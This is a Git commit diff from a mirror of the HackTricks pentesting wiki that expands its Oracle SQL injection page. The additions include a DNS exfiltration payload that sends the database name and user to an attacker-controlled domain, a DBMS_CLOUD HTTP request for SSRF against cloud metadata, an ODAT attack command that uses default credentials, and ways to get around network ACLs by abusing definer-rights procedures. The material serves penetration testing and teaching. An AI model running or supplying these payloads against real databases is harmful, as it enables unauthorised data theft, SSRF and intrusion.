maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Add content from: Research Update: Enhanced src/pentesting-web/sql-injection/o...

Browse Source
This commit is contained in:
HackTricks News Bot 2025-08-05 16:24:44 +00:00
parent 0f0e4e0900
commit 1a50bdc177
1 changed files with 94 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

98
src/pentesting-web/sql-injection/oracle-injection.md
View File

@ -156,9 +156,99 @@ select UTL_HTTP.request('http://scanme.nmap.org:25') from dual;
A `ORA-12541: TNS:no listener` or a `TNS:operation timed out` is a sign that the TCP port is closed, whereas a `ORA-29263: HTTP protocol error` or data is a sign that the port is open.
Another package I have used in the past with varied success is the [`GETCLOB()` method of the `HTTPURITYPE` Oracle abstract type](https://docs.oracle.com/database/121/ARPLS/t_dburi.htm#ARPLS71705) that allows you to interact with a URL and provides support for the HTTP protocol. The `GETCLOB()` method is used to fetch the GET response from a URL as a [CLOB data type.](https://docs.oracle.com/javadb/10.10.1.2/ref/rrefclob.html)[select HTTPURITYPE('http://169.254.169.254/latest/meta-data/instance-id').getclob() from dual;
Another package I have used in the past with varied success is the [`GETCLOB()` method of the `HTTPURITYPE` Oracle abstract type](https://docs.oracle.com/database/121/ARPLS/t_dburi.htm#ARPLS71705) that allows you to interact with a URL and provides support for the HTTP protocol. The `GETCLOB()` method is used to fetch the GET response from a URL as a [CLOB data type.](https://docs.oracle.com/javadb/10.10.1.2/ref/rrefclob.html)
```
SELECT HTTPURITYPE('http://169.254.169.254/latest/meta-data/instance-id').getclob() FROM dual;
```
---
## Additional Packages & Techniques (Oracle 19c → 23c)
### UTL_INADDR DNS-based exfiltration and host discovery
`UTL_INADDR` exposes simple name-resolution helpers that trigger an outbound DNS lookup from the database host. Because only a domain is required (no port/ACL needed) it is a reliable primitive for blind-exfil when other network callouts are blocked.
```sql
-- Leak the DB name and current user via a DNS query handled by Burp Collaborator
SELECT UTL_INADDR.get_host_address(
(SELECT name FROM v$database)||'.'||(SELECT user FROM dual)||
'.attacker.oob.server') FROM dual;
```
`get_host_address()` returns the resolved IP (or raises `ORA-29257` if resolution fails). The attacker only needs to watch for the incoming DNS request on the controlled domain to confirm code execution.
### DBMS_CLOUD.SEND_REQUEST full HTTP client on Autonomous/23c
Recent cloud-centric editions (Autonomous Database, 21c/23c, 23ai) ship with `DBMS_CLOUD`. The `SEND_REQUEST` function acts as a general-purpose HTTP client that supports custom verbs, headers, TLS and large bodies, making it far more powerful than the classical `UTL_HTTP`.
```sql
-- Assuming the current user has CREATE CREDENTIAL and network ACL privileges
BEGIN
-- empty credential when no auth is required
DBMS_CLOUD.create_credential(
credential_name => 'NOAUTH',
username => 'ignored',
password => 'ignored');
END;
/
DECLARE
resp DBMS_CLOUD_TYPES.resp;
BEGIN
resp := DBMS_CLOUD.send_request(
credential_name => 'NOAUTH',
uri => 'http://169.254.169.254/latest/meta-data/',
method => 'GET',
timeout => 3);
dbms_output.put_line(DBMS_CLOUD.get_response_text(resp));
END;
/
```
Because `SEND_REQUEST` allows arbitrary target URIs it can be abused via SQLi for:
1. Internal port scanning / SSRF to cloud metadata services.
2. Out-of-band exfiltration over HTTPS (use Burp Collaborator or an `ngrok` tunnel).
3. Callbacks to attacker servers even when older callout packages are disabled by ACLs.
If you only have a classical on-prem 19c but can create Java stored procedures, you can sometimes install `DBMS_CLOUD` from the OCI client bundle — useful in some engagements.
### Automating the attack surface with **ODAT**
[ODAT Oracle Database Attacking Tool](https://github.com/quentinhardy/odat) has kept pace with modern releases (tested up to 19c, 5.1.1 Apr-2022). The `utl_http`, `utl_tcp`, `httpuritype` and newer `dbms_cloud` modules automatically:
* Detect usable callout packages/ACL grants.
* Trigger DNS & HTTP callbacks for blind extraction.
* Generate ready-to-copy SQL payloads for Burp/SQLMap.
Example: quick OOB check with default creds (takes care of ACL enumeration in the background):
```bash
odat all -s 10.10.10.5 -p 1521 -d XE -U SCOTT -P tiger --modules oob
```
### Recent network ACL restrictions & bypasses
Oracle tightened default Network ACLs in the July 2023 CPU — unprivileged accounts now receive `ORA-24247: network access denied by access control list` by default. Two patterns still allow callouts through SQLi:
1. Target account owns an ACL entry (`DBMS_NETWORK_ACL_ADMIN.create_acl`) that was added by a developer for integrations.
2. The attacker abuses a high-privilege PL/SQL definer-rights routine (e.g. in a custom application) that *already* has `AUTHID DEFINER` and the necessary grants.
If you encounter `ORA-24247` during exploitation always search for reusable procedures:
```sql
SELECT owner, object_name
FROM dba_objects
WHERE object_type = 'PROCEDURE'
AND authid = 'DEFINER';
```
(in many audits at least one reporting/export procedure had the needed rights).
---
## References
* Oracle Docs `DBMS_CLOUD.SEND_REQUEST` package description and examples.
* quentinhardy/odat Oracle Database Attacking Tool (latest release 5.1.1, Apr-2022).
{{#include ../../banners/hacktricks-training.md}}